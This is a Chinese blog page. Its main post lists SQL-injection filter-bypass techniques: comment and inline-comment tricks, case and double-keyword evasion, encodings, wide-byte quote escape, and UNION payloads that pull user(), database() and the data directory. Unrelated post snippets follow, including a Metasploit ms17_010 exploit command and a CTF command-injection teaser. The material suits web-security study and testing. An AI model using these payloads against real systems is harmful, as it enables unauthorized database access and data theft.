当前位置：首页 > news >正文

【Web安全】sql注入绕过技法

news 2026/2/9 17:46:43

sql注入绕过技法

1. 注释符号绕过

原理：SQL注释符号（如--, /* */）可以用来忽略查询的一部分，特别是在注入点之后的部分。这对于绕过需要闭合的查询或移除查询余下部分的情况特别有用。

-- 注释内容
# 注释内容
/*注释内容*/
;

2. 内联注释绕过

原理：在SQL关键词中插入内联注释（如/**/），可以改变关键词的外观，绕过基于文本匹配的过滤器。

SEL/**/ECT。在SELECT中间加入内联注释，可能绕过对SELECT关键词的检查

3. 大小写绕过

原理：SQL是不区分大小写的，所以可以混合使用大小写字母来绕过对特定关键字（如SELECT, FROM）的过滤。

select 换成 SeleCT

4. 双写绕过

过滤器可能尝试移除某些关键字，利用重复的关键字可能绕过对于它们的单次出现

selselecctect
oOrr

5. 编码绕过

URL全编码

对关键字进行两次url全编码：

1+and+1=2
1+%25%36%31%25%36%65%25%36%34+1=2

ASCII绕过

使用ASCII码表示字符，这样可以绕过对普通字符集的过滤。

使用CHAR(65)代替A，在某些情况下可以绕过对直接字符A的过滤。

十六进制绕过

使用十六进制值来表示字符串，可以绕过对普通字符串的过滤。

使用0x414243代替字符串'ABC'。

Unicode编码绕过

使用Unicode编码来替代字符，以绕过对特定字符或字符串的过滤。

使用\u0041代替A。

6. 大于小于号绕过

在进行sql盲注的时候一般使用大于小于号来判断ascii的大小

greatest(n1,n2,n3…)和least(n1,n2,n3…)返回最大值和最小值

...where id=1 and greatest(ascii(substr(database(),1,1)),1)=99;

in关键字

where id=1 and substr(database(),1,1) in ('c');

between a and b(不包含b)

where id=1 and substr(database(),1,1) between 'a' and 'd';

7. 空格绕过

如果空格被过滤，可以使用其他字符或编码来代替空格，如注释、制表符等

/**/
()
回车(url编码中的%0a)
`(tap键上面的按钮)
tap
两个空格

8. 逻辑运算符绕过

OR、AND、XOR、NOT被过滤的话，可以采取以下方法：

or = ||
and = &&
xor = | 或者 ^
not = !

9. 等号绕过

如果等号=被过滤，可以尝试使用其他的操作符或逻辑来达成类似的效果。

1.假如要=1，那我们可以>0 and <2
2.<>等价于!=,所以在前面再加一个!,Select * from cms_users where !(username <> "admin");
3.like, username = 'admin'
4.username LIKE 'a%'。这将匹配任何以'a'开头的用户名
5.MySQL中使用 REGEXP 操作符来进行正则表达式匹配,Select * from cms_users where username REGEXP "admin";

10. 单引号绕过

1.where table_name="users" 换成 where table_name=0x7573657273
2.宽字节，用%df吃掉\，id=-1%df%27union select 1,user(),3--+
3.可能产生二次注入

11. 逗号绕过

我们可能会使用substr()，substring()，mid()等函数，里面会有逗号

对于substr()和mid()这两个方法可以使用from for 的方式来解决

 select substr(database() from 1 for 1)='c';

join关键字

union select 1,2,3,4;
union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);

like关键字

select ascii(mid(user(),1,1))=80
select user() like 'r%'

12. 关键函数绕过

1.sleep() -->benchmark() 指定次数表达式，造成延迟
2.使用 HEX('A') 或 BIN('A') 替代 ASCII('A')。
3.SELECT group_concat('str1','str2');->SELECT concat_ws(',', 'str1', 'str2');
4.使用SELECT @@user; 替代SELECT user();
5.ord()->ascii()
6.SELECT IF(substr(database(),1,1)='c',1,0);->SELECT IFNULL(substr(database(),1,1)='c',0); 或 SELECT CASE substr(database(),1,1)='c' WHEN 1 THEN 1 ELSE 0 END;

以上就是目前常见的绕过方法，本节参考文章，这篇文章后面写的很详细值得研究

【Web安全】sql注入绕过技法

sql注入绕过技法 1. 注释符号绕过原理：SQL注释符号（如--, /* */）可以用来忽略查询的一部分，特别是在注入点之后的部分。这对于绕过需要闭合的查询或移除查询余下部分的情况特别有用。 -- 注释内容 # 注释内容 /*注释内容*/ ;2…...

编程日记 2023/11/26 15:51:09

Axios使用方式

ajax是JQUERY封装的XMLHttprequest用来发送http请求 Axios简单点说它就是一个js库,支持ajax请求,发送axios请求功能更加丰富,丰富在哪不知道 1.npm使用方式 vue项目中 npm install axios 2.cdn方式 <script src"https://unpkg.com/axios/dist/axios.min.js">…...

编程日记 2023/11/26 15:50:08

kotlin 内置函数对数组进行各种操作

以下是一些常见的用法示例： plus() 函数将两个数组合并成一个数组。plus() 函数是 Kotlin 标准库中的一个扩展函数，可以用于合并两个同类型的数组。 fun main() {val array1 arrayOf(1, 2, 3)val array2 arrayOf(4, 5, 6)val mergedArray array1.plu…...

编程日记 2023/11/26 15:49:07

力扣labuladong——一刷day54

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录前言一、力扣1660. 纠正二叉树二、力扣100. 相同的树三、力扣572. 另一棵树的子树四、力扣101. 对称二叉树前言判断树是否相等，就直接遍历就可以。判断…...

编程日记 2023/11/26 15:48:06

3、MSF使用

文章目录一、利用ms17-010漏洞对靶机执行溢出攻击二、后渗透模块meterpreter的使用一、利用ms17-010漏洞对靶机执行溢出攻击分别输入以下命令，使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用： use exploit/windows/smb/ms17_010_eter…...

编程日记 2023/11/26 15:47:04

34970A 数据采集 / 数据记录仪开关单元

34970A 数据采集 / 数据记录仪开关单元产品综述： Keysight 34970A 数据采集/数据记录仪开关单元由一个 3 插槽主机和一个内置的 6 1/2 位数字万用表组成。每个通道可以单独配置，以测量 11 种不同功能之一，这样既不会增加成本，也…...

编程日记 2023/11/26 15:45:01

BUUCTF刷题之路-web-[GXYCTF2019]Ping Ping Ping1

启动环境后，是一个简简单单的页面： 看样子是能够触发远程执行漏洞的。尝试下ping 127.0.0.1，如果有回显说明我们的想法是对的。最近才学习的nc反弹shell。想着是否能用nc反弹shell的办法。控制服务器然后输出flag呢？于是我测试下…...

编程日记 2023/11/26 15:44:00

一、深入简出串口(USRT)通信——基本概念。

一、前言串口到底是什么？简单来说一句话就可以解释，串口就是一种通信协议。看到这里可能大家会觉得你这不是放屁么，说了跟没说一样。所以这里做前言来描述，大家要先对通信协议有一个下意识地认识才能在学习串口的时候不至于迷茫…...

编程日记 2023/11/26 15:42:58

采用connector-c++ 8.0操作数据库

1.下载最新的Connector https://dev.mysql.com/downloads/connector/cpp/，下载带debug的库。解压缩到本地，本次使用的是带debug模式的connector库： 注：其中mysqlcppconn与mysqlcppconn8的区别是： 2.在cmakelist…...

编程日记 2023/11/26 15:40:56

【Java数据结构 -- 时间和空间复杂度】

时间和空间复杂度 1. 算法效率2. 时间复杂度2.1 时间复杂度的概念2.2 大O的渐进表示法2.3 推导大O阶方法2.4 常见时间复杂度计算举例例1例2例3例4 计算 bubbleSort的时间复杂度例5 计算binarySearch的时间复杂度？例6 计算阶乘递归factorial的时间复杂度？…...

编程日记 2023/11/26 15:39:55

【每日一题】1457. 二叉树中的伪回文路径-2023.11.25

题目： 1457. 二叉树中的伪回文路径给你一棵二叉树，每个节点的值为 1 到 9 。我们称二叉树中的一条路径是「伪回文」的，当它满足：路径经过的所有节点值的排列中，存在一个回文序列。请你返回从根到叶子节点的所有路…...

编程日记 2023/11/26 15:37:53

能让PDF看起来像是扫描件的Look Scanned

什么是 Look Scanned ? Look Scanned 是一个能够让 PDF 看起来就像是扫描件一样的纯前端网站。你再也不需要麻烦地打印之后扫描了，你所需要的就是鼠标点几下。这是个挺有意思的软件，但是老苏不确定什么场景下会用到这个软件，如果不想自己搭…...

编程日记 2023/11/26 15:36:52

RT-DETR 更换损失函数之 SIoU / EIoU / WIoU / Focal_xIoU

文章目录更换方式CIoUDIoUEIoUGIoUSIoUWIoUFocal_CIoUFocal_DIoUFocal_EIoUFocal_GIoUFocal_SIoU提示更换方式第一步：将ultralytics/ultralytics/utils/metrics.py文件中的bbox_iou替换为如下的代码：class...

编程日记 2023/11/26 15:35:51

代码随想录算法训练营第四十六天 | 139.单词拆分，多重背包，背包问题总结

目录 139.单词拆分多重背包背包问题总结 01背包完全背包多重背包 139.单词拆分题目链接：139. 单词拆分不要求字典中的单词全部使用，但是要求拆分的单词拆分成的每一个子串都是字典中的单词。 （1）dp[ i ] 表示前 i 个字符组成…...

编程日记 2023/11/26 15:34:50

opencv-Canny 边缘检测

Canny边缘检测是一种经典的图像边缘检测算法，它在图像中找到强度梯度的变化，从而识别出图像中的边缘。Canny边缘检测的优点包括高灵敏度和低误检率。在OpenCV中，cv2.Canny() 函数用于执行Canny边缘检测。基本语法如下： edges…...

编程日记 2023/11/26 15:33:50

案例023:基于微信小程序的童装商城的设计与实现

文末获取源码开发语言：Java 框架：SSM JDK版本：JDK1.8 数据库：mysql 5.7 开发软件：eclipse/myeclipse/idea Maven包：Maven3.5.4 小程序框架：uniapp 小程序开发软件：HBuilder X 小程序…...

编程日记 2023/11/26 15:32:49

Ansible的循环：loop，with_＜lookup＞和until

环境管理节点：Ubuntu 22.04控制节点：CentOS 8Ansible：2.15.6 循环的方法 loopwith_<lookup>until 用这几种方式都可以实现循环。其中， loop 是推荐的用法，在很多时候能够替换 with_<lookup> 。 loop…...

编程日记 2023/11/26 15:31:48

点云 surface 方法总结

点云的表面方法是指通过点云数据来估计和重建物体或场景的表面几何形状。下面总结了几种常见的点云表面方法： 三角化：三角化是最常用的点云表面重建方法之一。它将点云中的点连接成三角形网格，从而重建出物体或场景的表面。常见的三角化算法…...

编程日记 2023/11/26 15:30:46

深入探索Linux文件系统：属性、路径与隐藏之谜

🎥 屿小夏 ： 个人主页 🔥个人专栏 ： Linux系统理论 🌄 莫道桑榆晚，为霞尚满天！ 文章目录 📑前言🌤️文件的组成☁️文件属性☁️文件内容☁️注意事项 🌤️路…...

编程日记 2023/11/26 15:29:45

梯度详解与优化实战

什么是梯度对所有自变量求偏微分构成的向量，它是一个向量（有大小和函数值增长方向） 导数是一个标量找最小值点坐标的案例 import torchimport numpy as np import matplotlib.pyplot as plt def himmelblau(x):return (x[0]**2x[1]-11)…...

编程日记 2023/11/26 15:28:44

边缘计算医疗风险自查APP开发方案

核心目标：在便携设备（智能手表/家用检测仪）部署轻量化疾病预测模型，实现低延迟、隐私安全的实时健康风险评估。一、技术架构设计 #mermaid-svg-iuNaeeLK2YoFKfao {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg…...

编程新知 2026/1/28 10:02:54

学校招生小程序源码介绍

基于ThinkPHPFastAdminUniApp开发的学校招生小程序源码，专为学校招生场景量身打造，功能实用且操作便捷。从技术架构来看，ThinkPHP提供稳定可靠的后台服务，FastAdmin加速开发流程，UniApp则保障小程序在多端有良好的兼…...

编程新知 2026/1/26 14:19:52

屋顶变身“发电站” ，中天合创屋面分布式光伏发电项目顺利并网！

5月28日，中天合创屋面分布式光伏发电项目顺利并网发电，该项目位于内蒙古自治区鄂尔多斯市乌审旗，项目利用中天合创聚乙烯、聚丙烯仓库屋面作为场地建设光伏电站，总装机容量为9.96MWp。项目投运后，每年可节约标煤3670…...

编程新知 2026/1/30 2:45:51

爬虫基础学习day2

# 爬虫设计领域工商：企查查、天眼查短视频：抖音、快手、西瓜 ---> 飞瓜电商：京东、淘宝、聚美优品、亚马逊 ---> 分析店铺经营决策标题、排名航空：抓取所有航空公司价格 ---> 去哪儿自媒体：采集自媒体数据进…...

编程新知 2025/12/5 3:38:11

【7色560页】职场可视化逻辑图高级数据分析PPT模版

7种色调职场工作汇报PPT，橙蓝、黑红、红蓝、蓝橙灰、浅蓝、浅绿、深蓝七种色调模版【7色560页】职场可视化逻辑图高级数据分析PPT模版：职场可视化逻辑图分析PPT模版https://pan.quark.cn/s/78aeabbd92d1...

编程新知 2026/1/23 12:22:14

Windows安装Miniconda

一、下载 https://www.anaconda.com/download/success 二、安装三、配置镜像源 Anaconda/Miniconda pip 配置清华镜像源_anaconda配置清华源-CSDN博客四、常用操作命令 Anaconda/Miniconda 基本操作命令_miniconda创建环境命令-CSDN博客...

编程新知 2026/1/31 7:39:20